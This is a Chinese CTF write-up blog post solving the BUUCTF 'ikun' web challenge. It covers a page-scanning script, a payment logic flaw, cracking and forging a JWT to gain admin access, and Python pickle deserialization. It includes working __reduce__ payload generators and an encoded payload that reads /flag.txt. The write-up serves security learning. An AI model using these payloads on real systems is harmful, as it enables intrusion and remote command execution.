网安学习-CTF夺旗

最新推荐文章于 2024-05-03 21:57:54 发布
最新推荐文章于 2024-05-03 21:57:54 发布
阅读量2.1k 收藏 8
点赞数
分类专栏: CTF 文章标签: 学习 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/126533498
版权

😋大家好,我是YAy_17,是一枚爱好网安的小白,正在自学ing。

本人水平有限,欢迎各位大佬指点,一起学习💗,一起进步⭐️

⭐️此后如竟没有炬火,我便是唯一的光。⭐️

Python序列化

以BUUCTF的[CISCN2019 华北赛区 Day1 Web2]ikun为例。

页面中有lv4,lv3等,通过查看网页的源代码发现。

写脚本去找就可以了,这里自己还是可以做出来的。

#寻找lv6.png
import requests
for i in range(1,1001):
    url = 'http://f6cc6bb9-1241-48fd-b904-c170ba5b45b6.node4.buuoj.cn:81/shop?page='+str(i)
    result = requests.get(url)
    if 'lv6.png' in result.text:
        print(url)
        break

得到对应的url;也就找到了对应的page,之后就是来到了购买的页面。

看到这里结合之前的学习,感觉应该是逻辑支付漏洞吧,还有优惠券,尝试通过抓包修改单价或者优惠券。 

这里尝试修改折扣的数据,回显给我们的结果是“该页面,只允许admin访问”;那就是垂直越权?

这里还是用到了之前学习到的JWT知识,没想起来!想学的知识很多,真正掌握的知识却没多少。

之后听了xd老师的课程之后,又回想起来了。

在数据包中清楚的看到Cookie中存在着JWT。

粗略的回顾一下JWT的知识点:

JWT是利用token验证的一种具体的实现方式,其全称为Json Web Token;通俗的说,JWT本质上就是一个字符串,他是将用户信息保存到一个Json中,然后进行编码后得到了一个JWT token,并且得到这个JWT token是带有签名信息的,接收后可以通过验证判断是否被篡改。

JWT结构:

JWT由三部分组成:标头(Header)、有效载荷(Payload)、签名(Signature);在传输的时候这三部分分别经过base64编码之后通过“.”号进行连接形成最终传递的字符串。

关于JWT的知识点可以参考之前做的笔记网安学习---Java安全之JWT安全及预编译CASE注入_YAy17的博客-CSDN博客 

JWT详解_baobao555#的博客-CSDN博客_jwt

这里通过网上的脚本来碰撞出密钥。github上的开源破解程序https://github.com/brendan-rius/c-jwt-cracker

首次使用的时候出现了错误,大家在首次使用的时候可以参考这篇文章:快速安装 c-jwt-cracker - litluo - 博客园

这里我破解出来的密钥如下:

接下来就是使用在线工具重新加密。JSON Web Tokens - jwt.io

 之后便是修改数据包中的JWT数据,修改JWT为admin的凭证 实现垂直越权

Cookie成功伪造!

右击源代码看一下。

发现备份的源码,下载。

 在Admin.py代码中发现了反序列化的函数。become先经过url解码,之后通过pickle进行反序列化。

先对python的反序列化进行总结:

其中,序列化:

pickle.dumps()

#其中pickle.dumps(object,file,protocol),有三个参数,分别是object:序列化的对象;file:将object序列化到file文件中;protocol:序列化的模式,可取值为0、1、2、true;其中0的时候,表示以文本的形式进行序列化;1或2或者True都表示以二进制的形式进行序列化

反序列化:

pickle.loads()

在Python中内置了__reduce__(self)函数,他很像php中的wake_up函数,在反序列化的时候,会执行该函数,那么我们可以通过这个函数来执行命令。

reduce函数返回一个元组。该元组包含2~5个元素。其中包含着一个可调用的对象,用于重建对象时调用;一个参数元素,供那个可调用对象使用;

#例:

class A(object):
    def __reduce__(self):
        return (os.system,('ls',))

#就会执行os.system('ls')

所以总体上的思路就是我们在reduce中构造一个我们想要执行的代码,之后进行序列化,在进行url编码,传递给become,让他进行反序列化执行reduce。

这里我用commands.getoutput()函数,因为它可以得到回显,方便我们的查看。

import urllib 
import pickle
import commands

class A(object):
    def __reduce__(self):
        return (commands.getoutput,('ls',)) #之后找到flag位置 使用cat即可

a = A();
b = urllib.quote(pickle.dumps(a))
print(b)

ccommands%0Agetoutput%0Ap0%0A%28S%27cat%20/flag.txt%27%0Ap1%0Atp2%0ARp3%0A.

 网上的wp是用到的eval函数。

#coding:utf-8 
import pickle
import urllib

class Test(object):
    def __reduce__(self):
        return (eval, ("open('/flag.txt','r').read()" ,))

a = Test()
s = pickle.dumps(a)
#print(s)
print(urllib.quote(s))

之后便是返回到刚才的“一键成为大会员”的界面。抓包修改become的值,修改为我们序列化+url编码之后的payload。便可以得到flag

Y4y17
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 550
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
[原题复现+审计][CISCN2019 华北赛区 Day1 Web2]ikun(逻辑漏洞、JWT伪造、python序列化)...
笑花大王
03-10 670
简介 原题复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/ 考察知识点:逻辑漏洞、JWT伪造、python反序列化 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信协会内部的CTF训练平台找到此题 简介 打开看信息 看到这一块 ...
攻防世界——WEB题目Ikun_BILIBILI
Y_KolaFish_Y的博客
07-27 1621
ikun_bilibili_wp 一、获取lv6账号位置 import requests target = "http://111.200.241.244:61777/shop?page=%d" for i in range(500): print(i) res = requests.get(target%(i)).text if "lv6.png" in res: print(target%(i)) break http://111.200.241
2024年全最新Web-CTF中的常见命令总结_webctf 修改css
最新发布
2401_84281588的博客
05-03 803
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
全CTF赛入门到入狱-入门介绍篇
2201_75735270的博客
09-25 863
flag是指一串具有一定格式的字符串或其他内容,flag可能来自于一台远端的服务 器,一个复杂的软件,也可能隐藏在一段通过密码算法或协议加密的数据,或是一 组络流量及音频视频文件中。选手需要综合利用自己掌握的全技术,并辅以快 速学习新知识,通过获取服务器权限,分析并破解软件或是设计解密算法等不限定 途径来获取flag。CTF攻防模式。
解密开展(CTF)竞赛前需要了解的十大问题
yy1715713348的博客
07-03 2205
解密开展(CTF)竞赛前需要了解的十大问题
stripe-ctf-2.0:
05-19
条纹络版 此存储库包含从Stripe CTF 2.0到2012年8月22日至29日运行的级别的源代码。
CTF战 基于Behavior Designer和DoTween插件.zip
12-29
CTF战 基于Behavior Designer和DoTween插件.zip
CTF赛.pdf
11-16
CTF赛.pdf
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
CTF Web解题大解密:如何找到神秘的Flag,成为赛的MVP
12-29
CTF,全称Capture The Flag,是一种全竞赛,参赛者需在虚拟环境中寻找并取对方的帜。而Web解题,则是CTF比赛中的一种重要类型。 在CTF Web解题中,我们的目标是找到隐藏在站中的Flag。这些Flag就像宝藏一样,藏在站的各个角落,只有找到它们,我们才能获得比赛的胜利。
flag寻找字符串的题目
10-16
有道题目,寻找flag字符串,格式不清楚,用notepad打开是乱码,用分析工具分析可能是cel文件,也可能不是,求各位大大分析下
2022工业互联大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
【青少年CTF】“Flag在哪里?”解题记录
qq_64868579的博客
06-04 1266
例如“Flag在哪里?青少年CTF训练平台:www.qsnctf.com。复制以后选择其中qsnctf{}部分提交即可。第一反应就是查看页源代码寻找flag。描述中并没有给出什么有用的信息。博主用户名:Fourstar.一般来讲有关于直接问Flag的。开启Game-Box题目环境。但是右键或者选中都没有用。所以直接F12进入检查。
CTF之CTF(赛)介绍
WenZhongxiang
10-06 4006
CTF攻防模式(Attack-Defense)是CTF比赛的一种模式,参赛队伍在络空间互相进行攻击和防守,挖掘络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。需要具备全编程的能力,能够编写全的代码等等。CTF比赛的知识范围大致分为:Web全、PWN(二进制全)、逆向工程、Misc(杂项)、Crypto(密码学全)、全。国外:ctftime.org 是对一个在国际上比较重要的赛事的做一些记录,而且会还会给出赛事的一些权重,以及对这种CTF 知名战队的一些排名。
CTF-8 靶场
猎荒者
02-23 2097
兵无常势,水无常形,能因敌而致胜者,谓之神 环境准备 VMware Workstation Pro12 Kali Linux (IP:10.10.16.128) CTF-8 虚拟机 NAT 络连接 1. 主机发现 fping -asg 10.10.16.0/24 访问靶机 http://10.10.16.138 查看源代码,发现 flag 2. 端口扫描 nmap -A -v -s...
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
热门推荐
morrino的博客
04-21 2万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
BUUCTF-Misc(13-24)
L_yrrr的博客
07-23 296
13 BUUCTF-qr 解码即可,如下图所示: 14 BUUCTF-zip伪加密
Ubuntu-CTF
07-28
CTFd是一个用于举办和参加CTF(Capture The Flag)全竞赛的平台。根据引用\[1\]和引用\[2\]的内容,你可以按照以下步骤在Ubuntu上搭建CTFd平台: 1. 首先,确保你已经装了虚拟机并配置好了Ubuntu系统。具体的装和配置步骤可以参考相关的教程。 2. 配置阿里云镜像下载源文件。这可以加快软件包的下载速度。你可以按照引用\[1\]中的指导进行配置。 3. 进入CTFd目录。在终端中使用cd命令进入CTFd的目录。 4. 使用gunicorn工具配置CTFd。根据引用\[2\]和引用\[3\]的内容,你可以使用以下命令配置gunicorn工具: ``` gunicorn --bind 0.0.0.0:8000 -w 5 "CTFd:create_app()" ``` 5. 如果你希望在重启电脑后再次运行CTFd平台,确保以root权限运行。在Ubuntu终端中使用sudo命令运行上述命令。 这样,你就可以在Ubuntu上成功搭建CTFd平台了。请注意,这只是一个简单的搭建过程,具体的配置和使用方法可能会有所不同,你可以参考相关的文档和教程进行更详细的了解和操作。 #### 引用[.reference_title] - *1* *2* *3* [基于Ubuntu搭建CTFd平台(全最全)](https://blog.csdn.net/qq_25953411/article/details/127489944)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值